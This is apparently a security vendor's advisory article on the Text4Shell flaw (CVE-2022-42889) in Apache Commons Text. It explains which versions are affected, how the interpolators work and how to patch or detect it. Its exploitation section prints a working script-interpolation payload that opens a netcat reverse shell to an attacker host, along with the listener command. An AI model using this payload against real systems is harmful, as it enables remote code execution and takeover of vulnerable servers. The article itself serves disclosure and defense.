- Cloud Native Applications
- Application Security
- Application Security
- Web Application Security
- Application Security Posture Management (ASPM)
- Microsegmentation
- Python Security
- SaaS Security
- Node.JS Security
- PHP Security
- AI in Cyber Security
- Cybersecurity for Financial Services
- The Principle of Least Privilege (PoLP)
- Identity and Access Management
- Cybersecurity in Banking
- Threat Detection and Response
- Cyber Kill Chain
- Threat Hunting
- Zero Trust Security
- Zero Trust Architecture
- Fileless Attacks
- DSPM
- Container Scanning
- Kubernetes
- Kubernetes
- Kubernetes Alternatives
- Kubernetes Namespace
- Kubernetes Architecture
- Kubernetes Cluster
- Kubernetes Nodes
- Kubernetes Pods
- Kubernetes Jobs
- Kubernetes Workloads
- Kubernetes Monitoring
- Kubernetes Security
- Kubernetes RBAC
- Secret Scanning
- Kubernetes Security Posture Management (KSPM)
- Kubernetes on AWS
- Kubernetes on VMware
- Kubernetes Vulnerability Scanning
- Managing Containers in Kubernetes
- K3s
- eBPF in Kubernetes
- Kubernetes Dashboard
- Kubernetes Operators
- Kubernetes Services
- Kubernetes Devops
- Kubernetes Networking
- Kubernetes ConfigMap
- Kubernetes Management
- Kubernetes Helm
- Kubernetes as a Service
- Kubernetes Serverless
- Kubernetes Tutorials
- Cloud Attacks
- Cloud Attacks
- Malware Attacks
- Zero Day Attack
- Top 10 Cyber Security Threats
- Arbitrary Code Execution
- Cryptojacking
- AI Attacks
- Prompt Injection
- Backdoor Attacks
- Reverse Shell Attack
- Remote Code Execution
- Defense Evasion
- Honeypots in Cybersecurity
- Malware Analysis
- AI Malware
- Lateral Movement
- Advanced Malware Protection
- CNAPP
- AI Security
- Container Platforms
- Containerized Architecture
- Containerized Architecture
- Docker Secrets
- Container Runtime Interface
- Container Images
- Image Scanning
- Container Compliance
- Docker Security Best Practices
- Container Security
- Container Security Best Practices
- Container Security Tools
- ECS Security
- Network Segmentation
- Istio security
- runC
- Service Mesh
- Image Repository
- Container Escape
- Container Runtime
- Docker Container
- OSS Container Image Scanning Tools
- What Is a Container?
- Docker Images
- Containerization 101
- VM vs. Container
- Containerization vs. Virtualization
- Containerized Applications
- Microservices and Containerization
- Registry Scanning
- Docker CVEs
- Docker Monitoring
- Securing Containers with Docker Scanning
- Docker CIS Benchmark
- Seccomp
- Docker Alpine
- Docker API
- Docker Tools
- 100 Best Docker Tutorials
- Docker Alternatives
- Docker Swarm
- Docker Containers vs. Virtual Machines (VMs)
- Docker Architecture
- Docker Networking
- Docker Registries
- Docker Orchestration
- OpenShift vs Docker
- Container Cloud Computing
- Container DevOps
- Docker in Production
- Container Monitoring
- Container Advantages
- Docker Hub
- Serverless Architecture
- Supply Chain Security
- Supply Chain Compliance
- SolarWinds Attack
- Supply Chain Security
- Secure Software Development Lifecycle
- Software Supply Chain Attacks
- Dependency Confusion Attack
- SLSA
- SSDF
- Software Composition Analysis
- Security Misconfigurations
- Repojacking
- Privilege Escalation
- CI/CD Security
- SAST Security
- GitLab Security
- GitHub Secret Scanning
- OWASP Dependency-Check
- Software Bill of Materials
- SBOM Tools
- NPM Vulnerabilities
- Log4j Vulnerability
- Text4Shell
- Secrets Management
- Jenkins Security
- Yarn vs. NPM
- Source Code Leaks
- Container Image Signing
- Open Source Licenses
- Vulnerability Management
- Vulnerability Management Tools
- Vulnerability Scanning Process
- Vulnerability Management
- Vulnerability Scanning
- Vulnerability Prioritization
- Open Source Vulnerability Scanning
- Vulnerability Remediation
- Vulnerability Scanner
- Risk-Based Vulnerability Management
- Vulnerability Exploitability eXchange (VEX)
- Malware Detection
- Fileless Malware
- Attack Vectors
- Malicious Code
- Risk Posture
- Alert Fatigue in Cybersecurity
- Cyber Security Posture
- MITRE ATT&CK
- MITRE ATT&CK Framework
- LLM Security
- Code Scanning
- Attack Surface
- Attack Surface Management
- What Are Indicators of Compromise (IoC)?
- Secure Code
- Configuration Drift
- Trivy
- DevSecOps
- DevSecOps
- DevSecOps Pipeline
- DevSecOps Best Practices
- DevSecOps vs SecDevOps
- Threat Modeling
- Mean Time to Repair (MTTR)
- eBPF Linux
- Cloud DevOps
- DevOps Tools
- GitOps vs DevOps
- Code Security
- Secure Code Review
- DevOps Security
- Infrastructure as Code (IaC) Security
- Infrastructure as Code DevOps
- Executive Order 14028 (U.S. Cybersecurity Executive Order)
- Open Source Security
- Shift-Left Security
- Shift Right Testing and Security
- What Is SecOps (Security Operations)?
- SecDevOps
- DevSecOps Tools
- Linux Security
- Rocky Linux
- Azure DevOps
- Cloud Security
- Cloud Security
- Cloud Security Challenges
- Cloud Security Tools
- Code to Cloud
- Cloud Protection
- Cloud Security Frameworks
- Cloud Security Standards
- Cloud Security Controls
- Cloud Security Posture Management (CSPM)
- AI Workloads
- Cloud Digital Forensics
- Cloud Computing Security Architecture
- What Is Enterprise Cloud Security?
- Virtualized Security
- CSPM Tools
- Vulnerabilities in Cloud Computing
- Top 7 Risks of Cloud Computing
- Cloud Security Assessment
- Cloud Visibility
- Cloud Governance
- Cloud Security Strategy
- Cloud Security Policy
- DFIR
- Cloud Workloads
- Public Cloud Security
- Private Cloud vs. Public Cloud
- Runtime Security
- Azure Cloud Security
- Azure Security Best Practices
- Azure Security vs. AWS Security
- AWS GovCloud: Basics & How It Compares to Azure & GCP
- S3 Security
- Cloud Misconfiguration
- Terraform Security
- Hybrid Cloud Security
- Multi-Cloud Strategy
- Agentless vs. Agent-Based Security & Monitoring
- Cloud Infrastructure Security
- Gartner CSPM
- Cloud Security Scanner
- AWS CIS Benchmark
- Cloud Configuration Management
- Cloud Workload Protection (CWP)
- Cloud Workload Protection Platforms (CWPP)
- Cloud Workload Security
- Cloud Vulnerabilities and Tools that Can Help
- Google Cloud Security
- Shared Responsibility Model
- AWS Shared Responsibility Model
- AWS Cloud Security
- Multi Cloud Security
- Cloud Compliance
- Kubernetes in Production
- Cloud Detection And Response
Text4Shell CVE (CVE-2022-42889): Impact and Fixes
Apache Commons Text is a popular open source library that manipulates strings. A new vulnerability was discovered that could lead to remote code execution (RCE).
Apache Commons Text is a library focused on working with string algorithms. On October 13, 2022, a new vulnerability, CVE-2022-42889, that could lead to remote code execution (RCE) was disclosed.
Security researcher Alvaro Muoz, who first reported the vulnerability, said the library’s default interpolators (specifically the StringSubstitutor class) made script evaluation insecure, meaning that using a library in its default configuration can lead to the execution of unwanted malicious code.
Because the library is widely used by the public, this new RCE flaw poses a threat to many organizations around the world. CVE-2022-42889 has a severity of 9.8 on the CVSS scale, indicating it is a very serious threat.
This is part of a series of articles about supply chain security.
In this article:
- Who Is Impacted By Text4Shell?
- How Text4Shell Vulnerability Works
- How to Exploit CVE-2022-42889
- Text4Shell Mitigation Recommendations
Who Is Impacted By Text4Shell?
Applications that use or depend on the Apache Commons Text library are affected—but not all applications. In addition to having a vulnerable version of Apache Commons Text, the application code must have a certain vulnerable pattern.
Text4Shell can only be exploited if the target system is running certain default interpolators in versions 1.5-1.9 (inclusive) of Apache Commons Text. String interpolation is the practice of mixing strings and integers to build new strings, and is a common threat vector in applications.
The Text4Shell vulnerability only occurs if the application imports org.apache.commons.text.StringSubstitutor and uses one these default interpolators:
- script—evalutes expressions using JVM script execution engine (
javax.script). - dns—resolves DNS records
- url—used to request information from a URL
How Text4Shell Vulnerability Works
Apache Commons Text is an open source library for performing various text manipulations. The Apache Software Foundation (ASF) describes this library as providing additional functionality for text processing in the standard Java Development Kit (JDK).
The security flaw affects Apache Commons Text versions 1.5 through 1.9. A PoC for CVE-2022-42889 has been published, but there are no known cases of the vulnerability being exploited.
The Apache Software Foundation released an Apache Commons Text released a security advisory detailing how to fix the threat. According to the bulletin, CVE-2022-42889 is the result of a variable interpolation process performed by the library. In library versions 1.5 through 1.9, the default set of lookup instances (e.g. “script”, “dns”, “url”) contain interpolators that can cause remote code execution.
Cybersecurity researchers added that users running Java 15 or later can avoid the risk because script interpolation is not applied, but the vulnerability could still be exploited through other vectors such as DNS or malicious URLs.
How to Exploit CVE-2022-42889
The exploitable component was placed in a Docker container and made available to an EC2 instance under the hacker’s control to reproduce the attack.
Additionally, the netcat (nc) program allows us to establish a reverse shell communication with the susceptible software. The susceptible web app provides access to a search API, and the StringSubstitutor library from Commons Text is used to interpolate the query:
http://web.app/text4shell/attack?search=<query>
The following payload is one possible exploit for this vulnerability, which would result in a reverse shell being opened:
${script:javascript:java.lang.Runtime.getRuntime().exec('nc 192.168.49.1 9090 -e /bin/sh')}
The above payload consists of ${prefix:name} that activates String searching. As stated previously, script, dns, and url can be employed as the prefix to attack the sensitivity. Before executing the constructed request, we must establish the reverse shell link by listening on port 9090 with the netcat (nc) command.
nc -nlvp 9090
We can now submit the constructed request with the payload URL encoded, as demonstrated below. It results in the attacker being able to establish a link to the vulnerable software.
Since this vulnerability has been exploited, the attacker can now gain root access to the vulnerable system and install malicious software.
Text4Shell Mitigation Recommendations
If you are using a vulnerable version of Apache Commons Text (1.5-1.9), the first step is to upgrade the library to a patched version (1.10 or later).
Like the previous CVE-2022-22963 vulnerability, this new vulnerability can be detected in three phases of the application lifecycle.
- In the build process using a software composition analysis (SCA) tool.
- In the deployment process using an image scanner on the Kubernetes admission controller.
- During runtime—using a runtime discovery engine like Aqua.
Connect your repository to Aqua Cloud Native Security Platform to detect this vulnerability in your environment. This will automatically map your dependencies and identify any vulnerable dependencies your project uses.
You can also identify and block all workloads and have this vulnerability, or prevent their execution, using Aqua’s assurance policies feature. Aqua provides a vulnerability scanner you can include as part of your CI/CD pipeline, which automatically identifies and blocks new builds with Text4Shell vulnerabilities.
- Supply Chain Compliance: 4 Standards You Should Know
- SolarWinds Attack: Play by Play and Lessons Learned
- Supply Chain Security: Mitigating the Supply Chain Threat
- What Is the Secure Software Development Lifecycle (SSDLC)?
- Software Supply Chain Attacks: 6 Examples and 6 Defensive Strategies
- Dependency Confusion Attack
- What Is SLSA and How to Use it for Supply Chain Security
- What Is SSDF (Secure Software Development Framework)?
- What Is Software Composition Analysis (SCA)?
- Security Misconfiguration: Types, Examples & Prevention Tips
- Why Repojacking Is a New Mega Threat & Protecting Your Projects
- Privilege Escalation in Windows, Linux, and K8s and 6 Ways to Prevent It
- CI/CD Security: Threats, Tools, and Best Practices
- SAST Security: Is SAST Still Relevant for Modern Applications?
- GitLab Security
- GitHub Secret Scanning
- How to Analyze the OWASP Dependency-Check?
- SBOM (Software Bill of Materials)
- What Are SBOM Tools?
- 6 Common npm Vulnerabilities and How to Fix Them
- Log4j Vulnerability: Updated Info and Protection for 2023
- What Is Secrets Management? Challenges and Best Practices
- Jenkins Security: How it Works & Best practices
- Yarn vs. NPM: Which Package Manager You Should Choose, and Why?
- Source Code Leaks: How to Avoid Them Before They Happen
- Container Image Signing: A Practical Guide
- 5 Open Source Licenses and Compliance Risks to Know About
- Show more
Aqua Cloud Native Application Protection Platform (CNAPP)
Go cloud native with the experts!